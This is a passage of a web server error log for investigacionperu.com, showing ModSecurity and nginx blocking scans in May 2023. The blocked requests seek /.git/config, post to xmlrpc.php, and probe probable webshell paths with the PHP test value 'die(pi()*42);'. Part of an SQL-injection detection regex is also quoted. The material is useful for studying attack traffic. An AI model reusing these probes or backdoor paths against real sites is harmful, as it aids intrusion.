"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFenliCjG3JT8_XFk1YwOQAAABI"] [Sun May 07 09:22:33.890763 2023] [:error] [pid 4593:tid 139812182910720] [client 152.89.196.77:40046] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/newsletter-optin-box/templates/contact.php"] [unique_id "ZFe0Kc5_9dmn1LuIdsoqgwAAAIo"] 2023/05/07 15:03:42 [error] 4549#4549: *836951 access forbidden by rule, client: 170.187.179.47, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/05/07 15:09:40 [error] 4549#4549: *837141 access forbidden by rule, client: 170.187.179.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun May 07 19:05:12.167190 2023] [:error] [pid 4788:tid 139812174518016] [client 152.89.196.77:35410] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/wp-admin.php"] [unique_id "ZFg8uIdcaXpEuS1TE1kH7QAAAMs"] [Mon May 08 03:30:20.371969 2023] [ssl:warn] [pid 27014:tid 139634631079808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 08 03:30:20.507011 2023] [ssl:warn] [pid 27015:tid 139634631079808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 08 03:30:21.023172 2023] [ssl:warn] [pid 27015:tid 139634631079808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 08 03:30:22.761234 2023] [ssl:warn] [pid 27015:tid 139634631079808] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 08 03:30:26.413643 2023] [ssl:warn] [pid 27489:tid 140658233288576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 08 03:30:26.537813 2023] [ssl:warn] [pid 27490:tid 140658233288576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon May 08 04:19:03.497538 2023] [autoindex:error] [pid 27512:tid 140658052667136] [client 43.154.67.30:33246] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon May 08 06:22:03.221775 2023] [:error] [pid 27511:tid 140657922385664] [client 5.188.62.21:40308] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFjbW2SfDp6yvwCIrlhJhAAAAEc"] [Mon May 08 08:02:46.711954 2023] [:error] [pid 27512:tid 140657913992960] [client 152.89.196.77:44486] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/core-stab/index.php"] [unique_id "ZFjy9uIcFtar4p7iIl7QpwAAAIg"] 2023/05/08 14:48:56 [error] 27441#27441: *886686 access forbidden by rule, client: 3.74.230.44, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 08 16:19:50.914298 2023] [:error] [pid 27512:tid 140657905600256] [client 5.188.62.174:40768] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFlnduIcFtar4p7iIl7ZLAAAAIk"] [Mon May 08 16:47:07.391758 2023] [:error] [pid 27512:tid 140657913992960] [client 152.89.196.77:42176] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "ZFlt2-IcFtar4p7iIl7ZqgAAAIg"] 2023/05/08 20:11:10 [error] 27440#27440: *899349 access forbidden by rule, client: 35.157.26.59, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon May 08 22:21:36.332260 2023] [:error] [pid 27510:tid 140657846851328] [client 152.89.196.77:57216] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twenty/twenty.php"] [unique_id "ZFm8QLjWIfUS5pxy1_NV9gAAABA"] [Tue May 09 00:33:13.420006 2023] [autoindex:error] [pid 27732:tid 140657922385664] [client 152.89.196.77:34076] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue May 09 03:39:21.488376 2023] [ssl:warn] [pid 12606:tid 140148023404416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 09 03:39:21.611331 2023] [ssl:warn] [pid 12607:tid 140148023404416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 09 03:39:21.978244 2023] [ssl:warn] [pid 12607:tid 140148023404416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 09 03:39:23.586714 2023] [ssl:warn] [pid 12607:tid 140148023404416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 09 03:39:25.855857 2023] [ssl:warn] [pid 13053:tid 140485585741696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 09 03:39:26.009216 2023] [ssl:warn] [pid 13054:tid 140485585741696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 09 05:05:54.840255 2023] [autoindex:error] [pid 13076:tid 140485175744256] [client 170.106.153.249:50434] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 09 06:59:05.875638 2023] [:error] [pid 13074:tid 140485192529664] [client 5.188.62.174:54856] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFo1iTEhCkpyadeoH3bfaAAAABE"] [Tue May 09 07:32:03.320354 2023] [autoindex:error] [pid 13699:tid 140485167351552] [client 20.25.190.163:56218] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 09 12:05:31.631153 2023] [:error] [pid 13699:tid 140485234493184] [client 5.188.62.26:48834] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFp9W22luf9D_Rrj25r-hAAAAMw"] [Tue May 09 14:08:31.213896 2023] [autoindex:error] [pid 13699:tid 140485167351552] [client 43.154.66.181:56646] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 10 01:10:22.337200 2023] [:error] [pid 13075:tid 140485167351552] [client 152.89.196.77:37382] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/wp-includes.php"] [unique_id "ZFs1TkRvwk6aoSj9EZOHFwAAAFQ"] [Wed May 10 03:35:19.000917 2023] [ssl:warn] [pid 31616:tid 139977026258816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 03:35:19.121793 2023] [ssl:warn] [pid 31617:tid 139977026258816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 03:35:19.466416 2023] [ssl:warn] [pid 31617:tid 139977026258816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 03:35:21.001224 2023] [ssl:warn] [pid 31617:tid 139977026258816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 03:35:23.251366 2023] [ssl:warn] [pid 32041:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 03:35:23.372985 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 09:03:45.161520 2023] [:error] [pid 32527:tid 140687878051584] [client 152.89.196.77:59648] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/form.php"] [unique_id "ZFukQZhqaMm0lM1lzWTN8QAAANM"] [Wed May 10 16:24:34.315973 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:24:36.687096 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:24:54.482316 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:29:16.784733 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:29:18.968253 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:29:36.812154 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:30:36.972524 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:42:50.346804 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:42:50.995481 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:42:55.654764 2023] [ssl:warn] [pid 32042:tid 140688288294784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 10 16:47:20.346827 2023] [:error] [pid 24867:tid 140688003942144] [client 152.89.196.77:37136] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-task.php"] [unique_id "ZFwQ6Ob98ZVpzBgOG7vjngAAAIQ"] [Thu May 11 00:43:15.319538 2023] [:error] [pid 24749:tid 140687869658880] [client 152.89.196.77:34064] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZFyAcyk-G8IK-VhFYuFe0AAAAFQ"] [Thu May 11 01:16:54.852708 2023] [:error] [pid 24867:tid 140687903229696] [client 5.188.62.26:37342] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFyIVub98ZVpzBgOG7v2JwAAAJA"] [Thu May 11 01:57:41.308167 2023] [:error] [pid 24867:tid 140687903229696] [client 5.188.62.174:40894] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFyR5eb98ZVpzBgOG7v4iQAAAJA"] [Thu May 11 02:20:44.105481 2023] [:error] [pid 24749:tid 140687836088064] [client 5.188.62.76:42774] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFyXTCk-G8IK-VhFYuFiFQAAAFg"] [Thu May 11 03:26:41.200316 2023] [ssl:warn] [pid 19905:tid 140637361407872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 03:26:41.334224 2023] [ssl:warn] [pid 19906:tid 140637361407872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 03:26:41.692285 2023] [ssl:warn] [pid 19906:tid 140637361407872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 03:26:43.239977 2023] [ssl:warn] [pid 19906:tid 140637361407872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 03:26:45.456507 2023] [ssl:warn] [pid 20324:tid 139999062366080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 03:26:45.585055 2023] [ssl:warn] [pid 20325:tid 139999062366080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 04:47:57.458479 2023] [:error] [pid 20559:tid 139998712014592] [client 5.188.62.140:49202] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZFy5zQH2q2bY8jEZher2NAAAAMw"] [Thu May 11 12:54:12.298854 2023] [ssl:warn] [pid 20325:tid 139999062366080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 13:07:59.959164 2023] [ssl:warn] [pid 17095:tid 140695428003712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 13:08:00.105202 2023] [ssl:warn] [pid 17096:tid 140695428003712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 14:07:16.126294 2023] [ssl:warn] [pid 17096:tid 140695428003712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 11 14:07:39.247743 2023] [ssl:warn] [pid 17096:tid 140695428003712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 12 00:37:28.065933 2023] [:error] [pid 24433:tid 140695025161984] [client 152.89.196.77:56926] [client 152.89.196.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-cast.php"] [unique_id "ZF3QmC4fPYweRNutzJI8tgAAANI"] [Fri May 12 01:13:49.222638 2023] [:error] [pid 24433:tid 140695050340096] [client 